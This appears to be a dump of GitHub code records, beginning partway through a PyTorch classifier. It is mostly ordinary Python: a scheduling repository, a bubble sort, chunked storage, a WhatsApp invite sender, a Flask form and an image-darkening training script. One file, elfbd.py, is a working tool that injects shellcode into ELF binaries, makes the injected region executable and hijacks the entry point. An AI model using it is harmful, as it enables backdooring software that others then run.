dim=1)\n # sub_labels = []\n # for label in labels.cpu().numpy():\n # lp = get_value('lpaths')[label]\n # if len(lp) <= l:\n # sub_labels.append(0)\n # else:\n # sub_labels.append(node.get_subid(lp[l]))\n # sub_labels = torch.as_tensor(sub_labels).to(self.device)\n\n # penalty += self.criterion(prob, sub_labels, len(node.children)+1) / l\n\n node.sub_prob = copy.copy(prob).data\n node.decay = torch.ones((x.shape[0], 1)).to(self.device)\n for i, child in node.children.items():\n # child.prob = sub_output[:, i+1]\n child.path_prob = prob[:, i+1] * node.path_prob\n if child.is_leaf():\n idx = get_value('label2id')[child.wnid]\n out[:, idx] += child.path_prob\n\n return out[:, 1:]\n\n def infer_hard(self, x):\n out = torch.zeros([x.shape[0], 2], dtype=torch.float32).to(self.device)\n\n for i in range(x.shape[0]):\n node = inner_nodes[1][0]\n path = [node.wnid]\n while not node.is_leaf():\n pred = node.choose_child(i)\n if pred == 0:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n p.sub_prob[i][k+1] = 0\n node = p\n else:\n node = 
node.children[pred-1]\n path.append(node.wnid)\n out[i][0] = label2id[path[-1]] - 1\n\n while node.parent != None:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n if node.is_leaf():\n p.decay[i] = 1 - p.sub_prob[i][k+1]\n p.sub_prob[i][k+1] = 0\n else:\n p.decay[i] = 1 - p.sub_prob[i][k+1] * (1 - node.decay[i])\n node = p\n\n # second infer\n node = inner_nodes[1][0]\n sec_path = [node.wnid]\n while not node.is_leaf():\n for k, v in node.children.items():\n if v.is_leaf():\n node.sub_prob[i][k+1] *= 1\n else:\n node.sub_prob[i][k+1] *= v.decay[i].item()\n pred = node.choose_child(i)\n if pred == 0:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n p.sub_prob[i][k+1] = 0\n node = p\n else:\n node = node.children[pred-1]\n sec_path.append(node.wnid)\n out[i][1] = label2id[sec_path[-1]] - 1\n\n return out\n","repo_name":"Jesson-Guo/neural-symbolic-Multi-granularity-classification","sub_path":"src/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3590152410","text":"from domain import UnavailabilityTime\n\n\ndef create_event(session, userId, title, startTime, endTime, periodicity):\n \"\"\"\n Function to create an event\n :param session: session\n :param userId: Integer, user id\n :param title: String, reason why unavailable\n :param startTime: DateTime, from what time is unavailable\n :param endTime: DateTime, to what time is unavailable\n :param periodicity: Integer, Daily = 1, Weekly = 2, One-Off = 3\n \"\"\"\n event = UnavailabilityTime(userId=userId, title=title, start=startTime, end=endTime,\n periodicity=periodicity)\n session.add(event)\n # session.expunge(question)\n session.flush()\n return event.eventId\n\n\ndef remove_event(session, userId, eventId):\n \"\"\"\n Function to remove an event\n :param session: session\n :param userId: Integer, id of the user who wants to remove an event\n :param eventId: Integer, id of the event to remove\n :return: True: remove successful\n False: remove failed\n \"\"\"\n existing = session.query(UnavailabilityTime).filter(UnavailabilityTime.userId == userId,\n UnavailabilityTime.eventId == eventId).first()\n if existing is not None and existing.status is True:\n existing.status = False\n return True\n return False\n\n\ndef update_event(session, userId, eventId, startTime, endTime, title, periodicity):\n \"\"\"\n Function to update an event\n :param session: session\n :param userId: Integer, id of the user who wants to update an event\n :param eventId: Integer, id of the event to be updated\n :param title: String, reason why unavailable\n :param startTime: DateTime, from what time is unavailable\n :param endTime: DateTime, to what time is unavailable\n :param periodicity: Integer, Daily = 1, Weekly = 2, One-Off = 3\n :return: True: update successful\n False: update failed\n \"\"\"\n event = session.query(UnavailabilityTime).filter(UnavailabilityTime.userId == userId,\n UnavailabilityTime.eventId == eventId).first()\n\n # guard against a missing event before reading its attributes\n if event is None or not event.status:\n return False\n # the model's columns are start/end (see create_event above), not startTime/endTime\n event.start = startTime\n event.end = endTime\n event.title = title\n event.periodicity = periodicity\n return True\n\n\ndef fetch_event(session, userId):\n \"\"\"\n Find all unavailable events for specified user\n :param session: session\n :param userId: user id\n \"\"\"\n events = session.query(UnavailabilityTime) \\\n .filter(UnavailabilityTime.status == 1, UnavailabilityTime.userId == 
userId).all()\n # We need to use objects after this session closed\n session.expunge_all()\n return events\n","repo_name":"TechlauncherFireApp/FireApp3.0","sub_path":"backend/repository/unavailability_repository.py","file_name":"unavailability_repository.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"9757327204","text":"from random import randint\n\"\"\"\nTask #4\n✔ The function receives a list of numbers as input.\n✔ Sort its elements in place without using\nthe sorts built into the language.\n✔ As an option, write a bubble sort.\nIts description can be found on Wikipedia.\n\"\"\"\n\n\ndef sort_(data: list):\n ind = 0\n while ind < len(data):\n for first in range(len(data) - 1):\n if data[first] > data[first + 1]:\n data[first + 1], data[first] = data[first], data[first + 1]\n ind += 1\n return data\n\nlst = [randint(-1000, 1000) for _ in range(10)]\nprint(lst)\nresult = sort_(lst)\nprint(result)","repo_name":"jonmd87/immersion_python","sub_path":"venv/seminars/Seminar_4/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71026041337","text":"#!/usr/bin/python\nfrom datastuff import *\nfrom array import array\nimport testdata as t\n\ndef getMaxChunks(space_id):\n max_chunks = -1\n if space_id == 'd':\n #tomi dropbox\n max_chunks = 1000\n elif space_id == 'g':\n #tomi google\n max_chunks = 1000\n return max_chunks\n\ndef getUsedChunks(space_id):\n used_chunks = -1\n if space_id == 'd':\n #tomi dropbox\n used_chunks = 100\n\n elif space_id == 'g':\n #tomi google\n used_chunks = 100\n return used_chunks\n\n# file is a bytes array\ndef upload_req(file, filename, size):\n # first verify if enough space\n d_available = getMaxChunks('d') - getUsedChunks('d')\n g_available = getMaxChunks('g') - getUsedChunks('g')\n if (d_available + g_available) * CHUNK_SIZE < size:\n return \"NOT_ENOUGH_SPACE\"\n\n start_chunk, start_offset = get_last_used_chunk_and_offset()\n\n if start_offset == CHUNK_SIZE:\n start_chunk = start_chunk + 1\n # reset the starting offset for the next chunk\n start_offset = DEFAULT\n\n chunks, chunk_IDs, end_offset = split(start_chunk, start_offset, size, file)\n\n add_file_to_filelist(filename, chunk_IDs, start_offset, end_offset)\n\n # store ranges\n for i in xrange(len(chunk_IDs) - 1):\n set_chunk_offset(chunk_IDs[i], CHUNK_SIZE)\n\n #last chunk\n set_chunk_offset(chunk_IDs[len(chunk_IDs) - 1], size % CHUNK_SIZE)\n\n return upload_storage(chunks, chunk_IDs)\n\n# received from the frontend\ndef download_req(filename, testFlag):\n chunk_start = get_file_start_offest(filename)\n chunk_end = get_file_end_offset(filename)\n \n chunk_numbers = get_file_chunks(filename) # list of chunk numbers\n\n # print chunk_start, ' ', chunk_end, ' ', chunk_numbers\n\n # request the chunks from tomi\n chunks = download_storage(chunk_numbers, testFlag)\n \n final_file = []\n if len(chunk_numbers) == 1:\n final_file = chunks[0][chunk_start : chunk_end]\n else:\n final_file = chunks[0][chunk_start:]\n for i in xrange(1, len(chunk_numbers) - 1):\n final_file = final_file + chunks[i]\n final_file = final_file + chunks[len(chunk_numbers) - 1][:chunk_end]\n\n return final_file\n\ndef download_storage(chunk_numbers, testing):\n #request to tomi\n chunks = []\n \n #TODO remove when not testing\n if testing:\n for i in xrange(len(chunk_numbers)):\n
 chunks.append(t.test_CHUNKS[chunk_numbers[i]]) \n\n return chunks\n\n# sent to tomi\ndef upload_storage(chunks, chunk_IDs):\n #files = generate_files(chunks)\n # call tomi with the files\n #print \"CHUNKS\", chunks, chunk_IDs\n spaces = ['d', 'g']\n # bad code:\n used_chunks = getUsedChunks('d') + getUsedChunks('g')\n max_used_chunks_d = getMaxChunks('d')\n max_used_chunks_g = getMaxChunks('g')\n\n for chunk in chunks:\n #TODO: send an upload request to tomi\n if used_chunks > max_used_chunks_d:\n a = 1\n #TODO: send an upload request to google\n else:\n a = 1\n #TODO: send an upload request to dropbox\n used_chunks = used_chunks + 1\n return chunks, chunk_IDs\n\n# request to tomi\ndef list_storage(userID):\n filelist = get_file_list()\n\n return filelist.keys()\n\n# write the file to a list of chunks\n# start chunk is requested and overwritten from the last file's offset\n# returns:\n# 1. the list of data chunks\n# 2. the list of associated chunk IDs\ndef split(start_chunk, start_offset, size, file):\n # TODO check if file fits in one chunk only\n offset = 0\n end_offset = 0\n chunk_number = start_chunk\n\n chunk_list = []\n chunk_IDs = []\n\n if start_offset > 0:\n initial_chunk, start_offset = req_chunk(start_chunk)\n\n if size < CHUNK_SIZE - start_offset:\n end_offset = start_offset + size\n else:\n end_offset = CHUNK_SIZE\n\n initial_chunk[start_offset:end_offset] = file[0 : (CHUNK_SIZE - start_offset)]\n size = size - (CHUNK_SIZE - start_offset)\n offset = CHUNK_SIZE - start_offset\n chunk_list.append(initial_chunk)\n chunk_IDs.append(chunk_number)\n chunk_number = chunk_number + 1\n\n while size > 0:\n if size < CHUNK_SIZE:\n new_chunk = array(\"B\", CHUNK_SIZE * '0')\n new_chunk[0 : size] = file[offset:]\n end_offset = size\n chunk_IDs.append(chunk_number)\n else:\n new_chunk = file[offset : offset + CHUNK_SIZE]\n offset = offset + CHUNK_SIZE\n end_offset = CHUNK_SIZE\n chunk_IDs.append(chunk_number)\n chunk_number = chunk_number + 1\n\n size = max(0, size - CHUNK_SIZE)\n\n chunk_list.append(new_chunk)\n\n return chunk_list, chunk_IDs, end_offset\n\n# makes request to storage backend for the last chunk that is\n# available for writing\n# also returns the offset where we can start writing in that chunk\n# TODO implementation\ndef req_chunk(start_chunk):\n # returns initial_chunk data, start_offset\n # return array(\"B\", \"g\"), 1\n return t.test_CHUNKS[start_chunk], chunk_index[start_chunk]\n","repo_name":"TomyRO/Mango","sub_path":"functii.py","file_name":"functii.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36578001708","text":"import pywhatkit\nimport time\nimport openpyxl\nfrom pathlib import Path\n\n# xlsx_file = Path('Guests.xlsx')\nxlsx_file = Path('Test.xlsx')\nwb_obj = openpyxl.load_workbook(xlsx_file)\nsheet = wb_obj.active\nrows = list(sheet.iter_rows())[2:]\n\nname_index = 0\nphone_index = 4\nwith_out_point_index = 9\nisrael_area = \"+972\"\ntext_message = \" dear ones!\\nWe are happy and excited to invite you to celebrate our wedding day with us!\"\n\nnames = []\nphone_numbers = []\n\nfor row in rows:\n if row[name_index].value is not None and row[phone_index].value is not None:\n names.append(row[name_index].value)\n clean_phone_number = str(row[phone_index].value)[:with_out_point_index]\n with_are_code = israel_area + str(clean_phone_number)\n phone_numbers.append(with_are_code)\n\n print(str(row[name_index].value) + \": \" + 
str(with_are_code))\nprint(len(phone_numbers))\nguests = zip(names, phone_numbers)\nfor guest in guests:\n print(guest[0])\n pywhatkit.sendwhats_image(guest[1], \"WeddingInvitation.jpeg\", guest[0] + text_message, 20, True, 5)\n time.sleep(1)\n","repo_name":"stavih19/MessagesWideDistribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9181212592","text":"#!/usr/bin/env python3\n\nimport sys\nsys.dont_write_bytecode = True\n\nimport struct\nfrom os import chmod\nfrom argparse import ArgumentParser\nfrom ELF.ELF import ELF\nfrom ELF.ELFEnum import *\nfrom log import Log\n\n\nprettyHex = lambda x: (hex(x) if isinstance(x, int) else ' '.join(hex(i) for i in x))\n\n\ndef gen_sc_wrapper(legit_e_entry, new_e_entry, shellcode, breakpoint, arch=ELFHeaderEnum.Class.ELF32.value, legit_instr=None):\n sc_wrapper = b\"\"\n sc_wrapper += b\"\\xe8\\x00\\x00\\x00\\x00\\x54\\x50\\x53\\x51\\x52\\x55\\x56\\x57\" # pushes\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\"\n if breakpoint:\n sc_wrapper += b\"\\xcc\"\n sc_wrapper += shellcode\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x41\\x5f\\x41\\x5e\\x41\\x5d\\x41\\x5c\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\"\n sc_wrapper += b\"\\x5f\\x5e\\x5d\\x5a\\x59\\x5b\\x58\\x5c\" # popes\n if legit_instr:\n sc_wrapper += legit_instr\n else:\n sc_wrapper += b\"\\x5b\"\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x48\"\n sc_wrapper += b\"\\x81\\xeb\"\n sc_wrapper += new_e_entry\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x48\"\n sc_wrapper += b\"\\x81\\xc3\"\n sc_wrapper += legit_e_entry\n sc_wrapper += b\"\\x53\"\n sc_wrapper += b\"\\xc3\"\n\n return sc_wrapper\n\ndef get_args():\n p = ArgumentParser()\n p.add_argument(\"-b\", \"--binary\", help=\"Binary path to backdoor\", required=True)\n p.add_argument(\"-s\", \"--shellcode\", help=\"Path to the raw shellcode (file)\", required=True)\n p.add_argument(\"-l\", \"--location\", help=\"Hex value of where to put the shellcode\", required=True)\n p.add_argument(\"-e\", \"--entry\", help=\"Where the shellcode should be called (default: binary entry point)\", default=None)\n p.add_argument(\"--breakpoint\", help=\"Add a breakpoint (\\\\xcc) at the begining of the shellcode\", action='store_true')\n\n return p.parse_args()\n\n\ndef main():\n args = get_args()\n log = Log(True)\n\n with open(args.binary, \"rb\") as f:\n binData = f.read()\n\n elf = ELF(binData)\n\n with open(args.shellcode, \"rb\") as f:\n shellcode = f.read()\n\n loc = int(args.location, 16)\n entry = int(args.entry, 16) if args.entry else None\n\n if elf.ei_mag != b\"\\x7f\\x45\\x4c\\x46\":\n log.error(\"Binary is not an ELF file. 
Exiting...\")\n return 1\n\n safe_cc = True\n for i in (elf.elf_file[loc], elf.elf_file[loc]+len(shellcode), 1):\n off = loc+i\n if elf.elf_file[off] != 0x00:\n safe_cc = False\n\n if not safe_cc:\n log.warn(\"Warning: selected codecave doesn't only contain null bytes\")\n\n secid = elf.get_section_id_from_offset(loc)\n phid = elf.get_prog_hdr_id_from_offset(loc)\n\n if entry:\n legit_loc = entry\n else:\n if elf.ei_class == ELFHeaderEnum.Class.ELF64.value:\n legit_loc = elf.e_entry\n else:\n legit_loc = elf.e_entry - elf.program_headers[phid].p_vaddr\n\n sc = gen_sc_wrapper(elf.p(\"I\", legit_loc), elf.p(\"I\", loc+5), shellcode, args.breakpoint, elf.ei_class)\n\n end_secid = elf.get_section_id_from_offset(loc+len(sc))\n end_phid = elf.get_prog_hdr_id_from_offset(loc+len(sc))\n\n if not phid:\n log.error(\"Error, location is outside of a program header.\")\n return\n\n elif not end_phid:\n log.warn(f\"Program header {log.construct(log.colors.fg.GREEN, ProgramHeaderEnum.Type(elf.program_headers[phid].p_type).name, log.colors.format.RESET)} is finishing before the end of the shellcode.\")\n resp = input(\"Increase its size? [Y/n] \")\n if resp.lower() != 'n':\n prev_size = elf.program_headers[phid].p_filesz\n elf.program_headers[phid].p_filesz = elf.program_headers[phid].p_filesz + len(sc)\n elf.program_headers[phid].p_memsz = elf.program_headers[phid].p_memsz + len(sc)\n log.info(f\"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.program_headers[phid].p_filesz), log.colors.format.RESET)} Bytes\")\n\n elif elf.program_headers[phid].p_type != elf.program_headers[end_phid].p_type:\n log.error(\"Error! The shellcode is overlapping 2 program headers. Find another place.\")\n elf.program_headers[phid].print_program_header()\n elf.program_headers[end_phid].print_program_header()\n return\n\n\n if not secid:\n print(\"[x] Error, location is outside of a section.\")\n return\n\n elif not end_secid:\n log.warn(f\"Section {log.construct(log.colors.fg.GREEN, elf.section_headers[secid].sh_name_str, log.colors.format.RESET)} is finishing before the end of the shellcode.\")\n resp = input(\"Increase its size? [Y/n] \")\n if resp.lower() != 'n':\n prev_size = elf.section_headers[secid].sh_size\n elf.section_headers[secid].sh_size = elf.section_headers[secid].sh_size + len(sc)\n log.info(f\"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.section_headers[secid].sh_size), log.colors.format.RESET)} Bytes\")\n\n elif elf.section_headers[secid].sh_name != elf.section_headers[end_secid].sh_name:\n log.error(\"Error! The shellcode is overlapping 2 sections. 
Find another place.\")\n elf.section_headers[secid].print_section_header()\n elf.section_headers[end_secid].print_section_header()\n return\n\n\n log.info(\"Setting required program header flags...\")\n elf.program_headers[phid].setFlags(ProgramHeaderEnum.Flags.PF_X.value | ProgramHeaderEnum.Flags.PF_W.value | ProgramHeaderEnum.Flags.PF_R.value)\n log.success(f\"Program header flags: {log.construct(log.colors.fg.MAGENTA, elf.program_headers[phid].prettyFlags(), log.colors.format.RESET)}\")\n\n log.info(\"Setting required section flags...\")\n elf.section_headers[secid].setFlags(SectionHeaderEnum.Flags.SHF_EXECINSTR.value | SectionHeaderEnum.Flags.SHF_WRITE.value | SectionHeaderEnum.Flags.SHF_ALLOC.value)\n log.success(f\"Section flags: {log.construct(log.colors.fg.MAGENTA, elf.section_headers[secid].prettyFlags(), log.colors.format.RESET)}\")\n\n\n if entry:\n new_instr = b\"\\xe8\" + elf.p(\"i\", loc-entry)\n import capstone\n md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)\n i=0\n legit_instrs = b\"\"\n for (addr, size, mnem, op_str) in md.disasm_lite(bytes(elf.elf_file[entry:entry+0x10]), entry):\n legit_instrs += elf.elf_file[entry+i:entry+size+i]\n i += size\n if i >= len(new_instr):\n break\n new_instr = new_instr + (b\"\\x90\"*(len(legit_instrs)-len(new_instr)))\n\n elf.elf_file[entry:entry+len(new_instr)] = new_instr\n sc = gen_sc_wrapper(elf.p(\"I\", legit_loc), elf.p(\"I\", loc+5), shellcode, args.breakpoint, elf.ei_class, legit_instrs)\n else:\n elf.e_entry = loc \\\n if elf.ei_class == ELFHeaderEnum.Class.ELF64.value \\\n else loc + elf.program_headers[phid].p_vaddr\n\n elf.elf_file[loc:loc+len(sc)] = sc\n\n newBinData = elf.build_elf()\n\n newFileName = f\"./{args.binary.split('/')[-1]}.bdoor\"\n with open(newFileName, \"wb\") as f:\n f.write(newBinData)\n chmod(newFileName, 0o755)\n\n log.success(f\"Backdoored file written at {log.construct(log.colors.fg.YELLOW, newFileName, log.colors.format.RESET)}!\")\n\n return 0\n\n\n\nif __name__=='__main__':\n exit(main())\n","repo_name":"wr34k/elf-backdoor","sub_path":"elfbd.py","file_name":"elfbd.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"13752913233","text":"import torchvision\nimport torch.optim\nimport os\nimport argparse\nimport time\n# from dataloader import ImageDataset\nfrom model import enhance_net_nopool_v2 as enhance_net_nopool # we use v2 in our paper (quadratic curve)\nimport loss_func\nimport numpy as np\nfrom torchvision import transforms\nimport torch\nfrom utils.utils import *\nimport numpy as np\nfrom utils.resnet import resnet101\nfrom PIL import Image\n\ndef make_dataset(dir):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n # if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n print(len(images))\n return images\n\nclass ImageDataset(torch.utils.data.Dataset):\n def __init__(self, root='', height=256, width=256, transform=None, path=False):\n if transform is None:\n self.transform = transforms.Compose([\n transforms.Resize((height, width)),\n transforms.ToTensor()\n ])\n else:\n self.transform = transform\n self.paths = sorted(make_dataset(root))\n self.path = path\n\n self.size = len(self.paths) # get the size of dataset A\n\n def __getitem__(self, index):\n # make sure index is within then range\n path = self.paths[index]\n A_img = 
Image.open(path).convert('RGB')\n # apply image transformation\n A = self.transform(A_img)\n\n # print(A.shape,B.shape)\n if self.path:\n return A, path\n else:\n return A\n\n def __len__(self):\n return len(self.paths)\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef train(args):\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n scale_factor = args.scale_factor\n DCE_net = enhance_net_nopool(scale_factor, curve_round=args.curve_round,\n encode_dim=args.encode_dim,\n down_scale=args.down_scale).cuda()\n\n DCE_net.train()\n\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop((224,224)),\n transforms.ToTensor(),\n ])\n \n mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]\n\n train_dataset = ImageDataset(args.lowlight_images_path, transform=transform)\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.train_batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True, drop_last=True)\n\n L_color = loss_func.L_color()\n L_down = loss_func.L_down()\n L_exp = loss_func.L_exp(args.patch_size, args.exp_weight)\n L_tv = loss_func.L_TV(mid_val=args.tv_mid)\n\n if args.sim:\n L_sim = loss_func.L_sim()\n resnet = resnet101(pretrained=True, return_last_feature=True).cuda().eval()\n resnet.requires_grad_ = False\n else:\n L_sim = None\n\n optimizer = torch.optim.Adam(DCE_net.parameters(\n ), lr=args.lr, weight_decay=args.weight_decay)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[int(i) for i in args.decreasing_lr.split(',')], gamma=0.1)\n\n DCE_net.train()\n low_exp, high_exp = args.exp_range.split('-')\n low_exp, high_exp = float(low_exp), float(high_exp)\n\n iteration = 1\n ltv, ldown, lcol, lexp, lsim = AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n ltotal = AverageMeter()\n while iteration <= args.max_iters:\n for img in train_loader:\n exp = torch.rand(args.train_batch_size, 1, 1, 1).cuda() * (high_exp - low_exp) + low_exp\n\n img = img.cuda()\n\n darkened_img, [enhance_r, down_scale] = DCE_net(img, exp)\n real_exp = darkened_img[0].mean().item()\n ori_exp = img[0].mean().item()\n if iteration % 50 == 0:\n torchvision.utils.save_image(\n darkened_img[0], 'checkpoints/'+args.experiment+'/outputs/'+str(iteration)+f'-{(exp[0].item()):.2f}-{real_exp:.2f}.png')\n torchvision.utils.save_image(\n img[0], 'checkpoints/'+args.experiment+'/outputs/'+str(iteration)+f'-gt-{ori_exp:.2f}.png')\n\n loss = 0.\n loss_TV = args.tv_weight * L_tv(enhance_r)\n loss += loss_TV\n ltv.update(loss_TV.item(), args.train_batch_size)\n\n loss_col = args.color_weight*torch.mean(L_color(darkened_img))\n loss += loss_col\n lcol.update(loss_col.item(), args.train_batch_size)\n\n loss_down = args.down_weight*L_down(down_scale)\n loss += loss_down\n ldown.update(loss_down.item(), args.train_batch_size)\n\n if L_sim is not None:\n # normalize\n img_norm = (img - torch.tensor(mean).view(3, 1, 1).cuda()) / torch.tensor(std).view(3, 1, 1).cuda()\n darkened_img_norm = (darkened_img - torch.tensor(mean).view(3, 1, 1).cuda()) / torch.tensor(std).view(3, 1, 1).cuda()\n out_ori = resnet(img_norm)\n out_low = resnet(darkened_img_norm)\n loss_sim = L_sim([out_ori], [out_low]) * args.sim_weight\n loss += loss_sim\n lsim.update(loss_sim.item(), args.train_batch_size)\n else:\n loss_sim = torch.zeros(1)\n\n 
loss_exp = torch.mean(L_exp(darkened_img, exp))\n loss += loss_exp\n lexp.update(loss_exp.item(), args.train_batch_size)\n\n ltotal.update(loss.item(), args.train_batch_size)\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(\n DCE_net.parameters(), args.grad_clip_norm)\n optimizer.step()\n\n if ((iteration+1) % args.display_iter) == 0:\n log.info('Iter [{}/{}] Loss: {:.4f} Loss_TV: {:.4f} Loss_down: {:.4f} Loss_col: {:.4f} Loss_exp: {:.4f}, Loss_sim {:4f}'.format(\n iteration+1, args.max_iters, loss.item(), loss_TV.item(), loss_down.item(), loss_col.item(), loss_exp.item(), loss_sim.item()))\n \n iteration += 1\n scheduler.step()\n \n if iteration > args.max_iters:\n break\n\n if iteration % 1000 == 0:\n torch.save(DCE_net.state_dict(\n ), 'checkpoints/' + args.experiment + \"/Iter\" + str(iteration) + '.pth')\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n # Input Parameters\n parser.add_argument('--lowlight_images_path', type=str,\n default=\"../visual-place-recognition/dataset/train/120k\",\n )\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--weight_decay', type=float, default=1e-4)\n parser.add_argument('--decreasing_lr', default='1000,3000', type=str)\n parser.add_argument('--grad_clip_norm', type=float, default=0.1)\n parser.add_argument('--max_iters', type=int, default=5000)\n parser.add_argument('--train_batch_size', type=int, default=8)\n parser.add_argument('--num_workers', type=int, default=4)\n parser.add_argument('--display_iter', type=int, default=10)\n parser.add_argument('--snapshot_iter', type=int, default=10)\n parser.add_argument('--scale_factor', type=int, default=1)\n parser.add_argument('--experiment', type=str,\n required=True, help=\"Name of the folder where the checkpoints will be saved\")\n parser.add_argument('--exp_range', type=str, default='0-0.5')\n parser.add_argument('--gpu_id', type=str, default='0')\n parser.add_argument('--patch_size', type=int, default=1)\n parser.add_argument('--width', type=int, default=224)\n parser.add_argument('--height', type=int, default=224)\n parser.add_argument('--exp_weight', type=float, default=10)\n parser.add_argument('--color_weight',type=float,default=25)\n\n parser.add_argument('--tv_weight',type=float,default=1600)\n parser.add_argument('--tv_mid', type=float, default=0.02)\n parser.add_argument('--sim',action='store_true')\n parser.add_argument('--sim_weight',type=float,default=0.1)\n parser.add_argument('--curve_round',type=int,default=8)\n\n parser.add_argument('--encode_dim',type=int,default=1)\n parser.add_argument('--down_scale',type=float,default=0.95)\n parser.add_argument('--down_weight',type=float,default=5)\n\n args = parser.parse_args()\n\n if not os.path.exists(os.path.join('checkpoints', args.experiment)):\n os.makedirs(os.path.join('checkpoints', args.experiment))\n if not os.path.exists(os.path.join('checkpoints', args.experiment, 'outputs')):\n os.makedirs(os.path.join('checkpoints', args.experiment, 'outputs'))\n\n log = logger(os.path.join('checkpoints', args.experiment))\n log.info(str(args))\n\n train(args)\n","repo_name":"Red-Fairy/ZeroShotDayNightDA","sub_path":"darkening/darken_vpr.py","file_name":"darken_vpr.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"22"} +{"seq_id":"8036197954","text":"import secrets\n\nfrom blake3 import blake3\n\n\ndef computeInputValue(bitcoin_address: bytes, message: bytes):\n # compute the 
bitcoin_address_hash\n bitcoin_address_hash = blake3(bitcoin_address).digest()\n # compute the message hash\n message_hash = blake3(message).digest()\n # compute the input by concatenating the bitcoin_address_hash\n # with the message hash\n input_value = bitcoin_address_hash + message_hash\n return input_value\n\n\n# this function produces the hash\ndef produce(\n bitcoin_address: bytes,\n message: bytes,\n application: str, timestamp: str, purpose: str, nounce=None):\n # compute the input value\n input_value = computeInputValue(bitcoin_address, message)\n # generate the random nounce if needed\n random_nounce = None\n if nounce is None:\n random_nounce = secrets.token_bytes(32)\n else:\n random_nounce = nounce\n # derive the key\n context = application + timestamp + purpose\n derived_key = blake3(random_nounce, derive_key_context=context).digest()\n # compute the hash\n _hash = blake3(input_value, key=derived_key).digest()\n return _hash, derived_key\n\n\n# this function allows to verify the hash\n# from verification data we have\n# * derived_key\n# * message\n# and from transaction data we have\n# * bitcoin_address\n# from the block\n# * _hash\ndef verify(derived_key: bytes,\n bitcoin_address: bytes,\n message: bytes,\n _hash: bytes):\n # compute the input value\n input_value = computeInputValue(bitcoin_address, message)\n # re-calculate the hash\n recalculated_hash = blake3(input_value, key=derived_key).digest()\n assert recalculated_hash == _hash\n","repo_name":"Blockfinance-ECO/Bitcoin-Value-Assert","sub_path":"bva.py","file_name":"bva.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7450455745","text":"from flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/submit_form', methods=['GET', 'POST'])\ndef submit_form():\n global data\n if request.method == 'POST':\n try:\n data = request.form.to_dict()\n #print(data[\"name\"], data[\"email\"])\n write_to_csv(data)\n return 'Thanks for submitting!!'\n\n except:\n return 'Your data was not saved to database!!!'\n\n else:\n return 'Something Went Wrong!!!'\n\n\n\n\ndef write_to_csv(data):\n with open('./database.csv','a', newline='') as dbfile2:\n name=data[\"name\"]\n email= data[\"email\"]\n dist= data[\"dist\"]\n location= data[\"location\"]\n csvWriter = csv.writer(dbfile2, delimiter=',',\n quotechar='|' ,quoting=csv.QUOTE_MINIMAL)\n csvWriter.writerow([name,email,dist,location])\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"arnabchat123/oxygen","sub_path":"oxy.py","file_name":"oxy.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33406058527","text":"class Solution:\n def 